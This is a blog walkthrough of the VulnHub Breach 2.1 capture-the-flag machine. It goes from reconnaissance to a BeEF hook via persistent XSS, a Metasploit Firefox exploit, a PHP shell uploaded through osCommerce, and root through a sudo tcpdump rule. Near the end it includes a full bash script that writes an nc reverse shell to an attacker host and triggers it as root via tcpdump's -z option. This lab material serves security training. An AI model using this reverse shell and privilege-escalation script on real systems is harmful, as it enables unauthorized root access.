Safetech Blog - Security Tips and Tricks


by Oana Stoian

Breach: 2.1

Dear all, today I will present my way of exploiting the vulnerable machine Breach 2.1. Many thanks to @mrb3n813 and @VulnHub.

For information gathering I will be using nmap:

SSH is listening on a non-standard port, 65535, so let's try to connect to it:

A banner is displayed, from which we learn about a possible user named Peter. Another potentially useful piece of information is that the machine may be hosting a blog, even though the scan revealed no web port.

We could try our luck with the user Peter over SSH, but the big problem is the password. It is hard to believe that the password is right in front of your eyes: inthesource 🙂

I fired up nmap one more time and got lucky: this time port 80 is open, running an Apache server.

The browser displays a photo. I tried to extract more information from it with ExifTool, but unfortunately no metadata was found. The next step was to look at the page source, where I could read a message, shown in the second screenshot:

[screenshot: beef_photo]

[screenshot: page source]

One of the hints for the web server is the blog. To be sure, I also used dirb to brute-force directories.

[screenshot: blog]

It seems an old PHP blog engine is running, so there is a good chance of finding known vulnerabilities and exploits for it.

Connecting all the information (Peter visits the blog often, and the picture on the web server's main page mentions BeEF), I started to think about a client-side exploit. Looking through Exploit-DB, there are many exploits for BlogPHP, including SQL injection and persistent XSS.

I exploited the SQLi, but the username is blank and the password hash also corresponds to an empty string, so there is no useful data here.

Moving on to the persistent XSS, I started the BeEF framework and injected its JavaScript hook into the register.html form, in the username parameter.

Shortly afterwards a Firefox browser connected to BeEF, confirming that client-side exploitation is indeed the way to go.

[screenshot: beef2]

To exploit this browser we'll use the Metasploit framework. After some trial and error we settled on the firefox_tostring_console_injection exploit. Using the same persistent XSS in the register.html page, I injected an iframe pointing the Firefox browser to our Metasploit web server.

Shortly afterwards a shell is received and we can interact with the operating system.

We spawned a second shell because the Metasploit session kept getting closed by the server:

Now we are connected as the user Peter and can start our journey to root. I did some enumeration (files readable in other users' home directories, running services, kernel version, files with special permissions, etc.), but nothing stood out. Then, by listing the network services running on the host, we see that not only SSH (65535) and HTTP (80) are running, but also an unknown service on port 2323 bound to localhost, and MySQL is also listening on localhost.

Connecting to localhost port 2323 with telnet prints some GPS coordinates: 29°45'46" N 95°22'59" W

Looking them up in a browser points to Houston, Texas:

[screenshot: houston]


Next, we are asked to log in. After some tries with combinations of the users peter, milton and blumbergh and the password Houston, we are able to log in with milton/Houston. Then another challenge must be passed: we are asked "Whose stapler is it?" What would Milton answer? Of course, "mine" 🙂

Now that we are logged in as milton, we are curious to take a look at his login/profile scripts, which are certainly executed when someone telnets to port 2323.

Here we find a script, /usr/local/bin/cd.py, that is responsible for asking the stapler question, and we also observe that a new web server (nginx) is started, so we can expect to find another open port: 8888.

[screenshot: 8888]

Here we have an osCommerce application ready to be broken.

Returning to our shell, we also notice that nginx is running as root, so by exploiting the application we might obtain root privileges.

I suddenly remembered that MySQL is running on the host, returned to the shell and tried to connect to it.

Now we can get the user accounts for osCommerce:

Searching for the hash on Google gives us the "complicated" password, which is admin.

Now we can log in to the osCommerce administrative interface and look for a way to obtain a reverse shell:

[screenshot: admin_oscommerce]

Here we have a File Manager, and it is just a matter of time to discover a writable folder where we can upload our shell:

[screenshot: php_uploaded]

This gets us a reverse shell, but we are not there yet: the user is not root as we expected, but blumbergh:

Since we have already gathered various information about the machine (running processes, special files, and so on) and do not need to repeat that as blumbergh, we check which commands blumbergh is allowed to run through sudo and discover that he can run tcpdump as root. Thinking this might be the way in, I read up on tcpdump looking for ways of executing arbitrary commands. The man page and previous experience were useful, and we arrived at the following syntax:

The /tmp/breach file should contain whatever command we want executed as root, so we put a classic nc reverse shell in it.
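As an added example (not code from the original write-up), here is how the tcpdump step fits together in one shell script: detect the sudo rule, write the post-rotate payload, and build the tcpdump command. The `sudo -l` sample, the attacker address and the payload name are assumptions. tcpdump's `-z` option runs a command after each capture-file rotation, so rotating every second (`-G 1`) with `-z` pointing at our script runs that script as root, provided `-Z root` stops tcpdump from dropping to an unprivileged user first (Debian-family packages do that by default).

```shell
#!/usr/bin/env bash
# Added example, not code from the original write-up: abusing a sudo rule
# that allows tcpdump as root. tcpdump's -z option runs a "post-rotate"
# command (as "<command> <rotated-file>") every time the capture file is
# rotated, so a rotation every second (-G 1) with -z pointing at our script
# executes that script as root.
set -euo pipefail

# Attacker listener (assumed values; start `nc -lvnp 4444` there first).
ATTACKER_HOST=${ATTACKER_HOST:-10.0.0.5}
ATTACKER_PORT=${ATTACKER_PORT:-4444}

# Constructed sample of `sudo -l` output in the shape the write-up describes;
# the real output from the box is not reproduced on the page.
SAMPLE_SUDO_L='Matching Defaults entries for blumbergh on Breach2:
    env_reset, mail_badpass

User blumbergh may run the following commands on Breach2:
    (root) NOPASSWD: /usr/sbin/tcpdump'

# Print the tcpdump path from a `sudo -l` listing if it may be run as root
# (via "(root)" or "(ALL)"); print nothing otherwise.
sudo_tcpdump_path() {
  printf '%s\n' "$1" |
    awk '/^[[:space:]]*\((root|ALL)[^)]*\).*tcpdump[[:space:]]*$/ { print $NF; exit }'
}

# Write the post-rotate payload. tcpdump execs it directly, so it needs a
# shebang and the execute bit. A FIFO-based reverse shell is used so it does
# not depend on the target's nc supporting -e.
write_payload() {  # $1 = payload path, $2 = attacker host, $3 = attacker port
  cat > "$1" <<EOF
#!/bin/sh
# invoked by tcpdump as root with the rotated capture file as its argument
rm -f /tmp/.f; mkfifo /tmp/.f
cat /tmp/.f | /bin/sh -i 2>&1 | nc $2 $3 > /tmp/.f
EOF
  chmod 755 "$1"
}

# Build the tcpdump command line:
#   -i lo -w /dev/null  capture on loopback, discard the packets
#   -G 1 -W 1           rotate after one second, exit after one rotation
#   -z <payload>        run the payload on rotation
#   -Z root             do not drop to the unprivileged "tcpdump" user
build_tcpdump_cmd() {  # $1 = tcpdump path from sudoers, $2 = payload path
  printf 'sudo %s -ln -i lo -w /dev/null -W 1 -G 1 -z %s -Z root' "$1" "$2"
}

# End-to-end run on the target (only when explicitly requested).
run_privesc() {
  local tcpdump_bin payload=/tmp/breach
  tcpdump_bin=$(sudo_tcpdump_path "$(sudo -n -l 2>/dev/null || true)")
  [ -n "$tcpdump_bin" ] || { echo "no sudo rule for tcpdump as root" >&2; return 1; }
  write_payload "$payload" "$ATTACKER_HOST" "$ATTACKER_PORT"
  # Rotation is checked when a packet arrives, so make sure lo sees traffic.
  ( sleep 2; ping -c 3 127.0.0.1 >/dev/null 2>&1 ) &
  eval "$(build_tcpdump_cmd "$tcpdump_bin" "$payload")"
}

if [ "${RUN_PRIVESC:-0}" = 1 ]; then
  run_privesc
fi
```

On the target, run it as `RUN_PRIVESC=1 bash breach_tcpdump.sh` with a listener already waiting on the attacker side; the root shell arrives on the first rotation, and `-W 1` makes tcpdump exit cleanly afterwards instead of re-running the payload every second.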


Now we are finally root and can get our precious flag:

[screenshot: flag.py]
